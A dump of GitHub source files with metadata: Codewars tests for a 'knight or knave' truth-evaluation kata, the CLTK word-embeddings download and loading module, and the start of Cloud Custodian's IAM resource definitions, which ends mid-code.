"name": "Batchfile",
"bytes": "6142"
},
{
"name": "CSS",
"bytes": "181457"
},
{
"name": "Dockerfile",
"bytes": "4748"
},
{
"name": "HTML",
"bytes": "867332"
},
{
"name": "JavaScript",
"bytes": "1191836"
},
{
"name": "Makefile",
"bytes": "6248"
},
{
"name": "Python",
"bytes": "4499987"
},
{
"name": "RAML",
"bytes": "27600"
},
{
"name": "Roff",
"bytes": "41"
},
{
"name": "Ruby",
"bytes": "1280"
},
{
"name": "SCSS",
"bytes": "27742"
},
{
"name": "Shell",
"bytes": "131207"
},
{
"name": "XSLT",
"bytes": "3357"
}
],
"symlink_target": ""
}
|
import unittest
from katas.beta.knight_or_knave import knight_or_knave
class KnightOrKnaveTestCase(unittest.TestCase):
def test_equal_1(self):
self.assertEqual(knight_or_knave(True), 'Knight!')
def test_equal_2(self):
self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
def test_equal_3(self):
self.assertEqual(knight_or_knave('4+2==5'), 'Knave! Do not trust.')
def test_equal_4(self):
self.assertEqual(knight_or_knave('2+2==4'), 'Knight!')
def test_equal_5(self):
self.assertEqual(knight_or_knave(True and False),
'Knave! Do not trust.')
def test_equal_6(self):
self.assertEqual(knight_or_knave(True or False), 'Knight!')
def test_equal_7(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_8(self):
self.assertEqual(knight_or_knave(
'not True and False or False or False'
), 'Knave! Do not trust.')
def test_equal_9(self):
self.assertEqual(knight_or_knave('3 is 3'), 'Knight!')
def test_equal_10(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_11(self):
self.assertEqual(knight_or_knave('True'), 'Knight!')
def test_equal_12(self):
self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
def test_equal_13(self):
self.assertEqual(knight_or_knave('True'), 'Knight!')
def test_equal_14(self):
self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
def test_equal_15(self):
self.assertEqual(knight_or_knave('2+2==5'), 'Knave! Do not trust.')
def test_equal_16(self):
self.assertEqual(knight_or_knave('4+1==5'), 'Knight!')
def test_equal_17(self):
self.assertEqual(knight_or_knave(True and False),
'Knave! Do not trust.')
def test_equal_18(self):
self.assertEqual(knight_or_knave(True or False), 'Knight!')
def test_equal_19(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_20(self):
self.assertEqual(knight_or_knave(
not False and True or False or True
), 'Knight!')
def test_equal_21(self):
self.assertEqual(knight_or_knave('4 is 3'), 'Knave! Do not trust.')
def test_equal_22(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_23(self):
self.assertEqual(knight_or_knave('True'), 'Knight!')
def test_equal_24(self):
self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
def test_equal_25(self):
self.assertEqual(knight_or_knave(False or False or False and False),
'Knave! Do not trust.')
def test_equal_26(self):
self.assertEqual(knight_or_knave(False), 'Knave! Do not trust.')
def test_equal_27(self):
self.assertEqual(knight_or_knave('9+2==3'), 'Knave! Do not trust.')
def test_equal_28(self):
self.assertEqual(knight_or_knave('105+30076==30181'), 'Knight!')
def test_equal_29(self):
self.assertEqual(knight_or_knave(True and False),
'Knave! Do not trust.')
def test_equal_30(self):
self.assertEqual(knight_or_knave(True or False), 'Knight!')
def test_equal_31(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_32(self):
self.assertEqual(knight_or_knave(
'not True and False or False or False'
), 'Knave! Do not trust.')
def test_equal_33(self):
self.assertEqual(knight_or_knave('3 is 3 is 3 is 9'),
'Knave! Do not trust.')
def test_equal_34(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_35(self):
self.assertEqual(knight_or_knave('True'), 'Knight!')
def test_equal_36(self):
self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
def test_equal_37(self):
self.assertEqual(knight_or_knave('True'), 'Knight!')
def test_equal_38(self):
self.assertEqual(knight_or_knave('False'), 'Knave! Do not trust.')
def test_equal_39(self):
self.assertEqual(knight_or_knave('2+2==5'), 'Knave! Do not trust.')
def test_equal_40(self):
self.assertEqual(knight_or_knave('4+1==5'), 'Knight!')
def test_equal_41(self):
self.assertEqual(knight_or_knave(True and False),
'Knave! Do not trust.')
def test_equal_42(self):
self.assertEqual(knight_or_knave(not False and not False), 'Knight!')
def test_equal_43(self):
self.assertEqual(knight_or_knave('"orange" is not "red"'), 'Knight!')
def test_equal_44(self):
self.assertEqual(knight_or_knave(
not False and True or False or True
), 'Knight!')
def test_equal_45(self):
self.assertEqual(knight_or_knave('4 is "blue"'),
'Knave! Do not trust.')
def test_equal_46(self):
self.assertEqual(knight_or_knave(not False), 'Knight!')
def test_equal_47(self):
self.assertEqual(knight_or_knave('True is not False'), 'Knight!')
def test_equal_48(self):
self.assertEqual(knight_or_knave('not True'), 'Knave! Do not trust.')
|
{
"content_hash": "d87960600e451773da41127d2fd3c7e3",
"timestamp": "",
"source": "github",
"line_count": 164,
"max_line_length": 77,
"avg_line_length": 32.68292682926829,
"alnum_prop": 0.6048507462686568,
"repo_name": "the-zebulan/CodeWars",
"id": "d3a60005e47b38ba9b69035d698cf12b709684e3",
"size": "5360",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/beta_tests/test_knight_or_knave.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "1203000"
}
],
"symlink_target": ""
}
|
"""Module for accessing pre-trained `fastText word embeddings
<https://fasttext.cc/>`_ and `Word2Vec embeddings from NLPL
<http://vectors.nlpl.eu/repository/>`_. Two sets of models are available
from fastText, one being trained only on corpora taken from
Wikipedia (`249 languages
<https://fasttext.cc/docs/en/pretrained-vectors.html>`_) and
the other being a combination of Wikipedia and Common Crawl
(`157 languages, a subset of the former
<https://fasttext.cc/docs/en/crawl-vectors.html>`_).
The Word2Vec models are in two versions, ``txt`` and ``bin``, with the
``txt`` being approximately twice the size and containing information
for retraining.
Note: In Oct 2022, we changed from the ``fasttext`` library to Spacy's ``floret``,
which contains ``fasttext``'s source but without its packaging problems.
# TODO: Classes ``Word2VecEmbeddings`` and ``FastTextEmbeddings`` contain duplicative code. Consider combining them.
# TODO: Instead of returning `None`, return an empty numpy array of correct len.
"""
import os
from typing import List
from zipfile import ZipFile
from gensim import models # type: ignore
from cltk.core.exceptions import CLTKException, UnimplementedAlgorithmError
from cltk.data.fetch import FetchCorpus
from cltk.languages.utils import get_lang
from cltk.utils import CLTK_DATA_DIR, get_file_with_progress_bar, query_yes_no
from cltk.utils.file_operations import make_cltk_path
MAP_CLTK_SELF_HOSTED_LANGS = dict(enm="enm")
MAP_NLPL_LANG_TO_URL = dict(
arb="http://vectors.nlpl.eu/repository/20/31.zip",
chu="http://vectors.nlpl.eu/repository/20/60.zip",
grc="http://vectors.nlpl.eu/repository/20/30.zip",
lat="http://vectors.nlpl.eu/repository/20/56.zip",
)
MAP_LANGS_CLTK_FASTTEXT = {
"ang": "ang", # Anglo-Saxon
"arb": "ar", # Arabic
"arc": "arc", # Aramaic
"got": "got", # Gothic
"lat": "la", # Latin
"pli": "pi", # Pali
"san": "sa", # Sanskrit
}
class CLTKWord2VecEmbeddings:
"""Wrapper for self-hosted Word2Vec embeddings."""
def __init__(
self,
iso_code: str,
model_type: str = "txt",
interactive: bool = True,
silent: bool = False,
overwrite: bool = False,
):
self.iso_code = iso_code
self.model_type = model_type
self.interactive = interactive
self.silent = silent
self.overwrite = overwrite
if self.interactive and self.silent:
raise ValueError(
"``interactive`` and ``silent`` options are not compatible with each other."
)
self._check_input_params()
self.model_path = make_cltk_path(
self.iso_code, "model", f"{self.iso_code}_models_cltk", "semantics"
)
# load model after all checks OK
self.fp_model = self._build_filepath()
if not self._is_model_present() or self.overwrite:
self._download_cltk_self_hosted_models()
elif self._is_model_present() and not self.overwrite:
# message = f"Model for '{self.iso_code}' / '{self.model_type}' already present at '{self.fp_model}' and ``overwrite=False``."
# print(message)
# TODO: Log message
pass
self.model: models.word2vec.Word2Vec = self._load_model()
def _build_filepath(self):
"""Create filepath where chosen language should be found."""
model_dir = os.path.join(
self.iso_code, "models", f"{self.iso_code}_models_cltk", "semantics"
) # type: str
return os.path.join(model_dir, f"me_word_embeddings_model.{self.model_type}")
def get_word_vector(self, word: str):
"""Return embedding array."""
try:
return self.model.wv.get_vector(word)
except KeyError:
return None
def get_embedding_length(self) -> int:
"""Return the embedding length for selected model."""
return self.model.vector_size
def get_sims(self, word: str):
"""Get similar words."""
return self.model.wv.most_similar(word)
def _check_input_params(self) -> None:
"""Confirm that input parameters are valid and in a
valid configuration.
"""
# 1. check if lang valid
get_lang(self.iso_code) # check if iso_code valid
# 2. check if any fasttext embeddings for this lang
if self.iso_code not in MAP_CLTK_SELF_HOSTED_LANGS:
available_embeddings_str = "', '".join(MAP_CLTK_SELF_HOSTED_LANGS.keys())
raise UnimplementedAlgorithmError(
f"No embedding available for language '{self.iso_code}'."
f" Self-hosted Word2Vec models available for: '{available_embeddings_str}'."
)
# 3. assert that model type is valid
valid_types = ["bin", "txt"]
if self.model_type not in valid_types:
unavailable_types_str = "', '".join(valid_types)
raise ValueError(
f"Invalid ``model_type`` {self.model_type}. Valid model types: {unavailable_types_str}."
)
def _download_cltk_self_hosted_models(self) -> None:
"""Perform complete download of Word2Vec models and save
them in appropriate ``cltk_data`` dir.
"""
if not self.interactive:
if not self.silent:
print(
f"CLTK message: Going to download the model ..."
) # pragma: no cover
# TODO download git repository
fetch_corpus = FetchCorpus(language=self.iso_code)
fetch_corpus.import_corpus(
corpus_name=f"{self.iso_code}_cltk_models", branch="main"
)
else:
print( # pragma: no cover
"CLTK message: This part of the CLTK depends upon word embedding models from the NLPL project."
) # pragma: no cover
dl_is_allowed = query_yes_no(
f"Do you want to download the {self.iso_code} models to {self.model_path}'?"
) # type: bool
if dl_is_allowed:
fetch_corpus = FetchCorpus(language=self.iso_code)
fetch_corpus.import_corpus(
corpus_name=f"{self.iso_code}_models_cltk", branch="main"
)
pass
else:
raise CLTKException(f"Impossible to download the model.")
def _is_model_present(self) -> bool:
"""Check if model in an otherwise valid filepath."""
if os.path.isdir(self.model_path):
return True
else:
return False
def _load_model(self) -> models.word2vec.Word2Vec:
"""Load model into memory.
"""
try:
return models.word2vec.Word2Vec.load(
os.path.join(self.model_path, os.path.basename(self.fp_model)))
except UnicodeDecodeError:
msg = f"Cannot open file '{self.fp_model}' with Gensim 'load_word2vec_format'."
print(msg)
raise UnicodeDecodeError
class Word2VecEmbeddings:
"""Wrapper for Word2Vec embeddings. Note: For models
provided by fastText, use class ``FastTextEmbeddings``.
"""
def __init__(
self,
iso_code: str,
model_type: str = "txt",
interactive: bool = True,
silent: bool = False,
overwrite: bool = False,
):
"""Constructor for ``Word2VecEmbeddings`` class."""
self.iso_code = iso_code
self.model_type = model_type
self.interactive = interactive
self.silent = silent
self.overwrite = overwrite
if self.interactive and self.silent:
raise ValueError(
"``interactive`` and ``silent`` options are not compatible with each other."
)
self._check_input_params()
# load model after all checks OK
self.fp_zip = self._build_zip_filepath()
self.fp_model = self._build_nlpl_filepath()
self.fp_model_dirs = os.path.split(self.fp_zip)[0] # type: str
if not self._is_nlpl_model_present() or self.overwrite:
self._download_nlpl_models()
self._unzip_nlpl_model()
elif self._is_nlpl_model_present() and not self.overwrite:
# message = f"Model for '{self.iso_code}' / '{self.model_type}' already present at '{self.fp_model}' and ``overwrite=False``."
# print(message)
# TODO: Log message
pass
self.model: models.keyedvectors.Word2VecKeyedVectors = self._load_model()
def get_word_vector(self, word: str):
"""Return embedding array."""
try:
return self.model.get_vector(word)
except KeyError:
return None
def get_embedding_length(self) -> int:
"""Return the embedding length for selected model."""
return self.model.vector_size
def get_sims(self, word: str):
"""Get similar words."""
return self.model.most_similar(word)
def _check_input_params(self) -> None:
"""Confirm that input parameters are valid and in a
valid configuration.
"""
# 1. check if lang valid
get_lang(self.iso_code) # check if iso_code valid
# 2. check if any fasttext embeddings for this lang
if self.iso_code not in MAP_NLPL_LANG_TO_URL:
available_embeddings_str = "', '".join(MAP_NLPL_LANG_TO_URL.keys())
raise UnimplementedAlgorithmError(
f"No embedding available for language '{self.iso_code}'. Word2Vec models available for: '{available_embeddings_str}'."
)
# 3. assert that model type is valid
valid_types = ["bin", "txt"]
if self.model_type not in valid_types:
unavailable_types_str = "', '".join(valid_types)
raise ValueError(
f"Invalid ``model_type`` {self.model_type}. Valid model types: {unavailable_types_str}."
)
def _build_zip_filepath(self) -> str:
"""Create filepath where .zip file will be saved."""
url_frag = MAP_NLPL_LANG_TO_URL[self.iso_code].split(".")[-2] # type: str
nlpl_id = int(url_frag.split("/")[-1]) # str
fp_zip = os.path.join(
CLTK_DATA_DIR, f"{self.iso_code}/embeddings/nlpl/{nlpl_id}.zip"
) # type: str
return fp_zip
def _build_nlpl_filepath(self) -> str:
"""Create filepath where chosen language should be found."""
model_dir = os.path.join(
CLTK_DATA_DIR, f"{self.iso_code}/embeddings/nlpl/"
) # type: str
return os.path.join(model_dir, f"model.{self.model_type}")
def _is_nlpl_model_present(self) -> bool:
"""Check if model in an otherwise valid filepath."""
if os.path.isfile(self.fp_model):
return True
else:
return False
def _download_nlpl_models(self) -> None:
"""Perform complete download of Word2Vec models and save
them in appropriate ``cltk_data`` dir.
"""
model_url = MAP_NLPL_LANG_TO_URL[self.iso_code]
if not self.interactive:
if not self.silent:
print(
f"CLTK message: Going to download file '{model_url}' to '{self.fp_zip} ..."
) # pragma: no cover
get_file_with_progress_bar(model_url=model_url, file_path=self.fp_zip)
else:
print( # pragma: no cover
"CLTK message: This part of the CLTK depends upon word embedding models from the NLPL project."
) # pragma: no cover
dl_is_allowed = query_yes_no(
f"Do you want to download file '{model_url}' to '{self.fp_zip}'?"
) # type: bool
if dl_is_allowed:
get_file_with_progress_bar(model_url=model_url, file_path=self.fp_zip)
else:
raise CLTKException(
f"Download of necessary Stanza model declined for '{self.language}'. Unable to continue with Stanza's processing."
)
def _unzip_nlpl_model(self) -> None:
"""Unzip model"""
with ZipFile(self.fp_zip, "r") as zipfile_obj:
zipfile_obj.extractall(path=self.fp_model_dirs)
def _load_model(self) -> models.keyedvectors.Word2VecKeyedVectors:
"""Load model into memory.
TODO: When testing show that this is a Gensim type
TODO: Suppress Gensim info printout from screen
"""
# KJ added these two checks because NLPL embeddings
# began erring in Gensim (Oct 2021)
is_binary: bool = False
unicode_errors: str = "strict"
if self.fp_model.endswith(".txt"):
unicode_errors = "ignore"
if self.fp_model.endswith(".bin"):
is_binary = True
try:
return models.KeyedVectors.load_word2vec_format(
self.fp_model,
binary=is_binary,
unicode_errors=unicode_errors,
)
except UnicodeDecodeError:
msg = f"Cannot open file '{self.fp_model}' with Gensim 'load_word2vec_format'."
print(msg)
raise UnicodeDecodeError
class FastTextEmbeddings:
"""Wrapper for fastText embeddings."""
def __init__(
self,
iso_code: str,
training_set: str = "wiki",
model_type: str = "vec",
interactive: bool = True,
overwrite: bool = False,
silent: bool = False,
):
"""Constructor for ``FastTextEmbeddings`` class."""
self.iso_code = iso_code
self.training_set = training_set
self.model_type = model_type
self.interactive = interactive
self.silent = silent
self.overwrite = overwrite
if self.interactive and self.silent:
raise ValueError(
"``interactive`` and ``silent`` options are not compatible with each other."
)
self._check_input_params()
# load model after all checks OK
self.model_fp = self._build_fasttext_filepath()
if not self._is_model_present() or self.overwrite:
self.download_fasttext_models()
elif self._is_model_present() and not self.overwrite:
message = f"Model for '{self.iso_code}' / '{self.training_set}' / '{self.model_type}' already present at '{self.model_fp}' and ``overwrite=False``."
# TODO: Log message
self.model = self._load_model()
def get_word_vector(self, word: str):
"""Return embedding array."""
try:
return self.model.get_vector(word)
except KeyError:
# TODO: To get an embedding from an OOV for sub-words, load the ``.bin`` file, too: `https://radimrehurek.com/gensim/models/fasttext.html#gensim.models.fasttext.load_facebook_model``_
return None
def get_embedding_length(self) -> int:
"""Return the embedding length for selected model."""
return self.model.vector_size
def get_sims(self, word: str):
"""Get similar words."""
return self.model.most_similar(word)
def download_fasttext_models(self):
"""Perform complete download of fastText models and save
them in appropriate ``cltk_data`` dir.
TODO: Add tests
TODO: Implement ``overwrite``
TODO: error out better or continue to _load_model?
"""
model_url = self._build_fasttext_url()
if not self.interactive:
if not self.silent:
print(
f"CLTK message: Going to download file '{model_url}' to '{self.model_fp} ..."
) # pragma: no cover
get_file_with_progress_bar(model_url=model_url, file_path=self.model_fp)
else:
print( # pragma: no cover
"CLTK message: This part of the CLTK depends upon word embedding models from the Fasttext project."
) # pragma: no cover
dl_is_allowed = query_yes_no(
f"Do you want to download file '{model_url}' to '{self.model_fp}'?"
) # type: bool
if dl_is_allowed:
get_file_with_progress_bar(model_url=model_url, file_path=self.model_fp)
else:
raise CLTKException(
f"Download of necessary Stanza model declined for '{self.iso_code}'. Unable to continue with Stanza's processing."
)
def _is_model_present(self):
"""Check if model in an otherwise valid filepath."""
if os.path.isfile(self.model_fp):
return True
else:
return False
def _check_input_params(self):
"""Look at combination of parameters give to class
and determine if any invalid combination or missing
models.
"""
# 1. check if lang valid
get_lang(self.iso_code) # check if iso_code valid
# 2. check if any fasttext embeddings for this lang
if not self._is_fasttext_lang_available():
available_embeddings_str = "', '".join(MAP_LANGS_CLTK_FASTTEXT.keys())
raise UnimplementedAlgorithmError(
f"No embedding available for language '{self.iso_code}'. FastTextEmbeddings available for: '{available_embeddings_str}'."
)
# 3. check if requested model type is available for fasttext
valid_model_types = ["bin", "vec"]
if self.model_type not in valid_model_types:
valid_model_types_str = "', '"
raise CLTKException(
f"Invalid model type '{self.model_type}'. Choose: '{valid_model_types_str}'."
)
# 4. check if requested training set is available for language for fasttext
training_sets = ["common_crawl", "wiki"]
if self.training_set not in training_sets:
training_sets_str = "', '".join(training_sets)
raise CLTKException(
f"Invalid ``training_set`` '{self.training_set}'. Available: '{training_sets_str}'."
)
available_vectors = list()
if self.training_set == "wiki":
available_vectors = ["ang", "arb", "arc", "got", "lat", "pli", "san"]
elif self.training_set == "common_crawl":
available_vectors = ["arb", "lat", "san"]
else:
CLTKException("Unanticipated exception.")
if self.iso_code in available_vectors:
pass
else:
available_vectors_str = "', '".join(available_vectors)
raise CLTKException(
f"Training set '{self.training_set}' not available for language '{self.iso_code}'. Languages available for this training set: '{available_vectors_str}'."
)
def _load_model(self):
"""Load model into memory.
TODO: When testing show that this is a Gensim type
TODO: Suppress Gensim info printout from screen
"""
return models.KeyedVectors.load_word2vec_format(self.model_fp)
def _is_fasttext_lang_available(self) -> bool:
"""Returns whether any vectors are available, for
fastText, for the input language. This is not comprehensive
of all fastText embeddings, only those added into the CLTK.
"""
get_lang(iso_code=self.iso_code)
if self.iso_code not in MAP_LANGS_CLTK_FASTTEXT:
return False
else:
return True
def _build_fasttext_filepath(self):
"""Create filepath at which to save a downloaded
fasttext model.
.. todo::
Do better than test for just name. Try trimming up to user home dir.
>>> from cltk.embeddings.embeddings import FastTextEmbeddings # doctest: +SKIP
>>> embeddings_obj = FastTextEmbeddings(iso_code="lat", silent=True) # doctest: +SKIP
>>> vec_fp = embeddings_obj._build_fasttext_filepath() # doctest: +SKIP
>>> os.path.split(vec_fp)[1] # doctest: +SKIP
'wiki.la.vec'
>>> embeddings_obj = FastTextEmbeddings(iso_code="lat", training_set="bin", silent=True) # doctest: +SKIP
>>> bin_fp = embeddings_obj._build_fasttext_filepath() # doctest: +SKIP
>>> os.path.split(bin_fp)[1] # doctest: +SKIP
'wiki.la.bin'
>>> embeddings_obj = FastTextEmbeddings(iso_code="lat", training_set="common_crawl", model_type="vec", silent=True) # doctest: +SKIP
>>> os.path.split(vec_fp)[1] # doctest: +SKIP
'cc.la.300.vec'
>>> embeddings_obj = FastTextEmbeddings(iso_code="lat", training_set="common_crawl", model_type="bin", silent=True) # doctest: +SKIP
>>> bin_fp = embeddings_obj._build_fasttext_filepath() # doctest: +SKIP
>>> vec_fp = embeddings_obj._build_fasttext_filepath() # doctest: +SKIP
>>> os.path.split(bin_fp)[1] # doctest: +SKIP
'cc.la.300.bin'
"""
fasttext_code = MAP_LANGS_CLTK_FASTTEXT[self.iso_code]
fp_model = None
if self.training_set == "wiki":
fp_model = os.path.join(
CLTK_DATA_DIR,
self.iso_code,
"embeddings",
"fasttext",
f"wiki.{fasttext_code}.{self.model_type}",
)
elif self.training_set == "common_crawl":
fp_model = os.path.join(
CLTK_DATA_DIR,
self.iso_code,
"embeddings",
"fasttext",
f"cc.{fasttext_code}.300.{self.model_type}",
)
else:
raise CLTKException(f"Unexpected ``training_set`` ``{self.training_set}``.")
return fp_model
def _build_fasttext_url(self):
"""Make the URL at which the requested model may be
downloaded."""
fasttext_code = MAP_LANGS_CLTK_FASTTEXT[self.iso_code]
if self.training_set == "wiki":
if self.model_type == "vec":
ending = "vec"
else:
# for .bin
ending = "zip"
url = f"https://dl.fbaipublicfiles.com/fasttext/vectors-wiki/wiki.{fasttext_code}.{ending}"
elif self.training_set == "common_crawl":
url = f"https://dl.fbaipublicfiles.com/fasttext/vectors-crawl/cc.{fasttext_code}.300.{self.model_type}.gz"
else:
raise CLTKException("Unexpected exception.")
return url
|
{
"content_hash": "10d63c0dcc73fd6e154ffe380a466ede",
"timestamp": "",
"source": "github",
"line_count": 564,
"max_line_length": 195,
"avg_line_length": 39.8031914893617,
"alnum_prop": 0.584257650674863,
"repo_name": "kylepjohnson/cltk",
"id": "e11245ec5ba782b993619316fa3834a77f779fc6",
"size": "22449",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "src/cltk/embeddings/embeddings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Jupyter Notebook",
"bytes": "120521"
},
{
"name": "Makefile",
"bytes": "2633"
},
{
"name": "Python",
"bytes": "3336083"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import, division, print_function, unicode_literals
from collections import OrderedDict
import csv
import datetime
import functools
import json
import io
from datetime import timedelta
import itertools
import time
from concurrent.futures import as_completed
from dateutil.tz import tzutc
from dateutil.parser import parse as parse_date
import six
from botocore.exceptions import ClientError
from c7n.actions import BaseAction
from c7n.exceptions import PolicyValidationError
from c7n.filters import ValueFilter, Filter
from c7n.filters.multiattr import MultiAttrFilter
from c7n.filters.iamaccess import CrossAccountAccessFilter
from c7n.manager import resources
from c7n.query import QueryResourceManager, DescribeSource, TypeInfo
from c7n.resolver import ValuesFrom
from c7n.tags import TagActionFilter, TagDelayedAction, Tag, RemoveTag
from c7n.utils import local_session, type_schema, chunks, filter_empty, QueryParser
from c7n.resources.aws import Arn
from c7n.resources.securityhub import OtherResourcePostFinding
@resources.register('iam-group')
class Group(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'group'
enum_spec = ('list_groups', 'Groups', None)
id = name = 'GroupName'
date = 'CreateDate'
config_type = "AWS::IAM::Group"
# Denotes this resource type exists across regions
global_resource = True
arn = 'Arn'
def get_resources(self, resource_ids, cache=True):
"""For IAM Groups on events, resource ids are Group Names."""
client = local_session(self.session_factory).client('iam')
resources = []
for rid in resource_ids:
try:
result = client.get_group(GroupName=rid)
except client.exceptions.NoSuchEntityException:
continue
group = result.pop('Group')
group['c7n:Users'] = result['Users']
resources.append(group)
return resources
@resources.register('iam-role')
class Role(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'role'
enum_spec = ('list_roles', 'Roles', None)
detail_spec = ('get_role', 'RoleName', 'RoleName', 'Role')
id = name = 'RoleName'
date = 'CreateDate'
config_type = "AWS::IAM::Role"
# Denotes this resource type exists across regions
global_resource = True
arn = 'Arn'
@Role.action_registry.register('tag')
class RoleTag(Tag):
"""Tag an iam role."""
permissions = ('iam:TagRole',)
def process_resource_set(self, client, roles, tags):
for role in roles:
try:
self.manager.retry(
client.tag_role, RoleName=role['RoleName'], Tags=tags)
except client.exceptions.NoSuchEntityException:
continue
@Role.action_registry.register('remove-tag')
class RoleRemoveTag(RemoveTag):
"""Remove tags from an iam role."""
permissions = ('iam:UntagRole',)
def process_resource_set(self, client, roles, tags):
for role in roles:
try:
self.manager.retry(
client.untag_role, RoleName=role['RoleName'], TagKeys=tags)
except client.exceptions.NoSuchEntityException:
continue
@resources.register('iam-user')
class User(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'user'
detail_spec = ('get_user', 'UserName', 'UserName', 'User')
enum_spec = ('list_users', 'Users', None)
id = name = 'UserName'
date = 'CreateDate'
config_type = "AWS::IAM::User"
# Denotes this resource type exists across regions
global_resource = True
arn = 'Arn'
def get_source(self, source_type):
if source_type == 'describe':
return DescribeUser(self)
return super(User, self).get_source(source_type)
class DescribeUser(DescribeSource):
def get_resources(self, resource_ids, cache=True):
client = local_session(self.manager.session_factory).client('iam')
results = []
for r in resource_ids:
try:
results.append(client.get_user(UserName=r)['User'])
except client.exceptions.NoSuchEntityException:
continue
return results
@User.action_registry.register('tag')
class UserTag(Tag):
"""Tag an iam user."""
permissions = ('iam:TagUser',)
def process_resource_set(self, client, users, tags):
for u in users:
try:
self.manager.retry(
client.tag_user, UserName=u['UserName'], Tags=tags)
except client.exceptions.NoSuchEntityException:
continue
@User.action_registry.register('remove-tag')
class UserRemoveTag(RemoveTag):
"""Remove tags from an iam user."""
permissions = ('iam:UntagUser',)
def process_resource_set(self, client, users, tags):
for u in users:
try:
self.manager.retry(
client.untag_user, UserName=u['UserName'], TagKeys=tags)
except client.exceptions.NoSuchEntityException:
continue
User.action_registry.register('mark-for-op', TagDelayedAction)
User.filter_registry.register('marked-for-op', TagActionFilter)
@User.action_registry.register('set-groups')
class SetGroups(BaseAction):
"""Set a specific IAM user as added/removed from a group
:example:
.. code-block:: yaml
- name: iam-user-add-remove
resource: iam-user
filters:
- type: value
key: UserName
value: Bob
actions:
- type: set-groups
state: remove
group: Admin
"""
schema = type_schema(
'set-groups',
state={'enum': ['add', 'remove']},
group={'type': 'string'},
required=['state', 'group']
)
permissions = ('iam:AddUserToGroup', 'iam:RemoveUserFromGroup',)
def validate(self):
if self.data.get('group') == '':
raise PolicyValidationError('group cannot be empty on %s'
% (self.manager.data))
def process(self, resources):
group_name = self.data['group']
state = self.data['state']
client = local_session(self.manager.session_factory).client('iam')
op_map = {
'add': client.add_user_to_group,
'remove': client.remove_user_from_group
}
for r in resources:
try:
op_map[state](GroupName=group_name, UserName=r['UserName'])
except client.exceptions.NoSuchEntityException:
continue
@resources.register('iam-policy')
class Policy(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'policy'
enum_spec = ('list_policies', 'Policies', None)
id = 'PolicyId'
name = 'PolicyName'
date = 'CreateDate'
config_type = "AWS::IAM::Policy"
# Denotes this resource type exists across regions
global_resource = True
arn = 'Arn'
def get_source(self, source_type):
if source_type == 'describe':
return DescribePolicy(self)
return super(Policy, self).get_source(source_type)
class DescribePolicy(DescribeSource):
def resources(self, query=None):
qfilters = PolicyQueryParser.parse(self.manager.data.get('query', []))
query = query or {}
if qfilters:
query = {t['Name']: t['Value'] for t in qfilters}
return super(DescribePolicy, self).resources(query=query)
def get_resources(self, resource_ids, cache=True):
client = local_session(self.manager.session_factory).client('iam')
results = []
for r in resource_ids:
try:
results.append(client.get_policy(PolicyArn=r)['Policy'])
except ClientError as e:
if e.response['Error']['Code'] == 'NoSuchEntityException':
continue
return results
class PolicyQueryParser(QueryParser):
QuerySchema = {
'Scope': ('All', 'AWS', 'Local'),
'PolicyUsageFilter': ('PermissionsPolicy', 'PermissionsBoundary'),
'PathPrefix': six.string_types,
'OnlyAttached': bool
}
multi_value = False
value_key = 'Value'
@resources.register('iam-profile')
class InstanceProfile(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'instance-profile'
enum_spec = ('list_instance_profiles', 'InstanceProfiles', None)
id = 'InstanceProfileId'
name = 'InstanceProfileId'
date = 'CreateDate'
# Denotes this resource type exists across regions
global_resource = True
arn = 'Arn'
@resources.register('iam-certificate')
class ServerCertificate(QueryResourceManager):
class resource_type(TypeInfo):
service = 'iam'
arn_type = 'server-certificate'
enum_spec = ('list_server_certificates',
'ServerCertificateMetadataList',
None)
id = 'ServerCertificateId'
name = 'ServerCertificateName'
date = 'Expiration'
# Denotes this resource type exists across regions
global_resource = True
@User.filter_registry.register('usage')
@Role.filter_registry.register('usage')
@Group.filter_registry.register('usage')
@Policy.filter_registry.register('usage')
class ServiceUsage(Filter):
"""Filter iam resources by their api/service usage.
Note recent activity (last 4hrs) may not be shown, evaluation
is against the last 365 days of data.
Each service access record is evaluated against all specified
attributes. Attribute filters can be specified in short form k:v
pairs or in long form as a value type filter.
match-operator allows to specify how a resource is treated across
service access record matches. 'any' means a single matching
service record will return the policy resource as matching. 'all'
means all service access records have to match.
Find iam users that have not used any services in the last year
:example:
.. code-block:: yaml
- name: unused-users
resource: iam-user
filters:
- type: usage
match-operator: all
LastAuthenticated: null
Find iam users that have used dynamodb in last 30 days
:example:
.. code-block:: yaml
- name: unused-users
resource: iam-user
filters:
- type: usage
ServiceNamespace: dynamodb
TotalAuthenticatedEntities: 1
LastAuthenticated:
type: value
value_type: age
op: less-than
value: 30
match-operator: any
https://aws.amazon.com/blogs/security/automate-analyzing-permissions-using-iam-access-advisor/
"""
JOB_COMPLETE = 'COMPLETED'
SERVICE_ATTR = set((
'ServiceName', 'ServiceNamespace', 'TotalAuthenticatedEntities',
'LastAuthenticated', 'LastAuthenticatedEntity'))
schema_alias = True
schema_attr = {
sa: {'oneOf': [
{'type': 'string'},
{'type': 'boolean'},
{'type': 'number'},
{'type': 'null'},
{'$ref': '#/definitions/filters/value'}]}
for sa in SERVICE_ATTR}
schema_attr['match-operator'] = {'enum': ['all', 'any']}
schema_attr['poll-delay'] = {'type': 'number'}
schema = type_schema(
